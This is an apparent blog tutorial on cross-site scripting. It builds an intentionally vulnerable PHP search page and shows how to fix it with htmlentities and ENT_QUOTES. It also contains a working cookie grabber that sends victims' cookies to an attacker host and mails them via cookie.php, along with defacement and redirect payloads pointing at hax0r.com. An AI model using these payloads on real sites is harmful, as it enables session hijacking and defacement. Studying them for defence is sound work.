Showing posts with label Xss Complete Tutorial. Show all posts

Tuesday, November 23, 2010

======Chapter 1 - What is XSS ?========

Cross-site scripting (XSS) is an injection flaw: a web application takes
attacker-controlled input (a search term, a guestbook entry, a URL parameter)
and writes it into a page without encoding it, so the victim's browser runs
the attacker's script with the permissions of the site that served the page,
including access to that site's cookies and DOM. That is what the remaining
chapters demonstrate.

A related browser-side problem is cross-zone scripting, a browser exploit
taking advantage of a vulnerability within a zone-based security solution.
The attack allows content (scripts) in unprivileged zones
to be executed with the permissions of a privileged zone, i.e.
a privilege escalation within the client (web browser) executing the script.
The vulnerability could be:

* a web browser bug which under some conditions allows content (scripts)
in one zone to be executed with the permissions of a higher privileged zone;

* a web browser configuration error, such as unsafe sites listed in a privileged zone;

* a cross-site scripting vulnerability in a site that belongs to a privileged zone.

A common attack scenario involves two steps.
The first step is to use a cross-zone scripting vulnerability
to get scripts executed within a privileged zone. The second step is to
perform malicious actions on the computer through insecure ActiveX components
that the privileged zone is allowed to instantiate.

This type of vulnerability has been exploited to silently install
various malware (such as spyware, remote control software, worms and such)
onto computers browsing a malicious web page.

==========Chapter 2 - Code an XSS vulnerability==========


Open Notepad and copy/paste this script:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style><title>Simple XSS vulnerability by Xylitol</title>
</head>
<body>
<!-- the search term is POSTed to XSS.php, which echoes it back unencoded -->
<form action="XSS.php" method="post">
<p align="center"><strong>Simple XSS vulnerability by Xylitol </strong></p>
<div align="center">
<table width="270" border="0">
<tr>
<td width="106"><strong>Search:</strong></td>
<td width="154"><input name="Vulnerability" type="text" id="Vulnerability" /></td>
</tr>
</table>
<table width="268" border="0">
<tr>
<td width="262"><div align="center">
<input name="submit" type="submit" value=" Search it ! " />
</div></td>
</tr>
</table>
</div>
</form>
</body>
</html>




Then save this page as index.html.
Open a new Notepad window and copy/paste this:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Search result:</title>
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style></head>
<body>
<span class="alerte">Search result :</span>&nbsp;<strong><?php /* vulnerable: user input is echoed without any encoding */ echo $_POST['Vulnerability']; ?></strong>&nbsp;
</body>
</html>

Save this page as XSS.php and close Notepad.

Open index.html in Firefox. The two files must be served by a web server with PHP
(for example under http://127.0.0.1/), not opened from disk, or the PHP will never run.
Enter a value and search.
Go back to the search page and enter <script>alert('XSS')</script>
Send the form.
Bingo, a dialog box!

 _________________________________________
| http://127.0.0.1 says:                X |
|_________________________________________|
|                                         |
|     /!\    XSS                          |
|                                         |
|                 [ OK ]                  |
|_________________________________________|

The XSS vulnerability is here...

========Chapter 3 - Make a cookie grabber=======

Insert this script in a vulnerable page (for example a guestbook):

<script>
// Sends the victim's cookies for the vulnerable site to the attacker's server.
// Only cookies set without the HttpOnly flag are readable through document.cookie.
window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);
</script>


(www.Hax0r.com = your site)
Open Notepad and make a page named cookie.php.
Copy/paste this code:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Error</title>
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style></head>
<?php
// The grabber appends the victim's cookies to the URL as ?cookies=..., so they
// arrive in $_GET['cookies'] (the original read a bare $cookies, which only
// works with the long-deprecated register_globals). Mail them to the attacker.
if (isset($_GET['cookies'])) { mail('email@example.com', 'Cookie stolen! - thx xyli :)', $_GET['cookies']); }
?>
<body>
<h2><strong>Error</strong> - <strong>Access denied</strong> for <?php echo $_SERVER["REMOTE_ADDR"]; ?></h2>
</body>
</html>


All the attacker has to do now is wait for the email and read the cookie from it.
Note that this only works for cookies the site set without the HttpOnly flag;
a session cookie marked HttpOnly never appears in document.cookie.
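
What the grabber above actually receives depends on how the site set its cookies. The following is an added example, not code from the original tutorial: a Node.js model of the rule document.cookie follows (cookies carrying the HttpOnly attribute are invisible to page script), run over constructed Set-Cookie headers. The header values, cookie names and function names are this example's own.

```javascript
// Added example (not from the original tutorial): which cookies the Chapter 3
// grabber can read. document.cookie exposes only cookies that were set
// without HttpOnly, so we parse Set-Cookie headers and apply that rule.

// Parse one Set-Cookie header into { name, value, attrs }, attribute names lower-cased.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const name = eq === -1 ? '' : pair.slice(0, eq);
  const value = eq === -1 ? pair : pair.slice(eq + 1);
  const attrs = {};
  for (const item of rest) {
    if (!item) continue;
    const i = item.indexOf('=');
    const key = (i === -1 ? item : item.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : item.slice(i + 1);
  }
  return { name, value, attrs };
}

// The string a page script gets from document.cookie: "name=value" pairs
// joined by "; ", with every HttpOnly cookie left out.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !('httponly' in c.attrs))
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Did the site's session cookie leak? Constructed check against a given name.
function sessionCookieExposed(setCookieHeaders, sessionName) {
  return setCookieHeaders
    .map(parseSetCookie)
    .some((c) => c.name === sessionName && !('httponly' in c.attrs));
}

// Constructed sample: a PHP session cookie protected by HttpOnly, two others not.
const sampleHeaders = [
  'PHPSESSID=8f3a1c2d; Path=/; HttpOnly',
  'theme=dark; Path=/',
  'remember=abc123; Path=/; Secure',
];

// This is what lands in $_GET['cookies'] on the attacker's cookie.php:
// the session id is missing, only theme and remember are sent.
console.log(scriptVisibleCookies(sampleHeaders));
console.log('session exposed:', sessionCookieExposed(sampleHeaders, 'PHPSESSID'));
```

Run it with node; with the sample headers the grabber would receive only "theme=dark; remember=abc123". HttpOnly defeats this particular payload but not XSS itself: script running in the page can still act in the victim's session without ever reading the cookie, and the defacements in Chapter 5 need no cookie at all.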

======Chapter 4 - Securing against XSS======

FIX it:
To fix the XSS vulnerability, encode the output with htmlentities():

In XSS.php, replace:
<body>
<span class="alerte">Search result :</span>&nbsp;<strong><?php echo $_POST['Vulnerability']; ?></strong>&nbsp;
</body>

By:

<body>
<span class="alerte">Search result :</span>&nbsp;<strong><?php
if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability'], ENT_QUOTES, 'ISO-8859-1'); } ?></strong>&nbsp;
</body>

htmlspecialchars() in PHP does the same job for the five characters that matter
(& < > " '). Either way, pass ENT_QUOTES so that single and double quotes are
encoded too, and name the charset the page is served with (iso-8859-1 here);
without ENT_QUOTES the same value echoed into an attribute such as value="..."
can still break out of it.

Other functions people reach for:
htmlentities() with ENT_QUOTES: fine, same rules as above.
strip_tags(): removes tags but leaves quotes alone, so a payload with no tag at all
still breaks out of an attribute; do not rely on it as an XSS fix.
...
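
To see why encoding beats tag stripping, here is an added example that is not code from the original tutorial: a Node.js model of the Chapter 2 search page rendering a query with no sanitizer, with a strip_tags()-style filter, and with htmlspecialchars(ENT_QUOTES)-style encoding, in the text context XSS.php uses and in an attribute context (the search box refilled with the last query). The function names, templates, payloads and the crude tag tokenizer are this example's own.

```javascript
// Added example, not from the original tutorial: vulnerable echo beside two
// "fixes", evaluated in two output contexts.

// What htmlspecialchars($s, ENT_QUOTES) does: encode the five HTML
// metacharacters so the value can only ever be text, never markup.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// A strip_tags()-style filter: delete anything shaped like a tag, keep the rest.
function stripTags(s) {
  return String(s).replace(/<[^>]*>/g, '');
}

// Two places the search page might echo the query (constructed templates).
// text: as in XSS.php, between <strong> tags.
// attr: a common variant, refilling the search box with the previous query.
const templates = {
  text: (q) => `<span class="alerte">Search result :</span>&nbsp;<strong>${q}</strong>`,
  attr: (q) => `<input name="Vulnerability" type="text" value="${q}" />`,
};

// Stand-in for the browser's tokenizer, enough for this demo: list start tags
// with their attribute names, honouring quoted values so that encoded text
// inside value="..." is not mistaken for an attribute of its own.
function startTags(html) {
  const tags = [];
  const tagRe = /<([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  const attrRe = /([^\s=\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = [];
    let a;
    while ((a = attrRe.exec(m[2])) !== null) attrs.push(a[1].toLowerCase());
    tags.push({ name: m[1].toLowerCase(), attrs });
  }
  return tags;
}

// Would the rendered page run attacker script? True if the input produced a
// <script> element or an on* event-handler attribute.
function looksExecutable(html) {
  return startTags(html).some(
    (t) => t.name === 'script' || t.attrs.some((n) => n.startsWith('on'))
  );
}

// Constructed payloads: the tutorial's own, and one with no tag at all, which
// tag stripping leaves intact but which closes value="..." and adds a handler.
const payloads = {
  scriptTag: "<script>alert('XSS')</script>",
  breakAttribute: '" onmouseover="alert(1)',
};

const sanitizers = { none: (s) => s, stripTags, escapeHtml };

// result[payload][context][sanitizer] === true means the page is still exploitable.
function evaluate() {
  const result = {};
  for (const [p, payload] of Object.entries(payloads)) {
    result[p] = {};
    for (const [ctx, tpl] of Object.entries(templates)) {
      result[p][ctx] = {};
      for (const [s, fn] of Object.entries(sanitizers)) {
        result[p][ctx][s] = looksExecutable(tpl(fn(payload)));
      }
    }
  }
  return result;
}

console.log(JSON.stringify(evaluate(), null, 2));
```

Run it with node and read the matrix: for the tutorial's <script> payload in the text context, both filters stop it; for the quote-only payload in the attribute context, stripTags still leaves the page exploitable while escapeHtml does not, which is exactly the gap ENT_QUOTES closes.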

========Chapter 5 - Deface methods========

Defacing with an XSS is a rather simple thing;
here are the principal ways...

Defacement by an image:
<IMG SRC="http://hax0r.com/Haxored.png">

Or a Flash video:
<EMBED SRC="http://hax0r.com/Haxored.swf">

Better known: the redirection (window.open opens the attacker's page in a new window):
<script>window.open( "http://www.hax0r.com/Haxored.html" )</script>

Also see:
<meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" />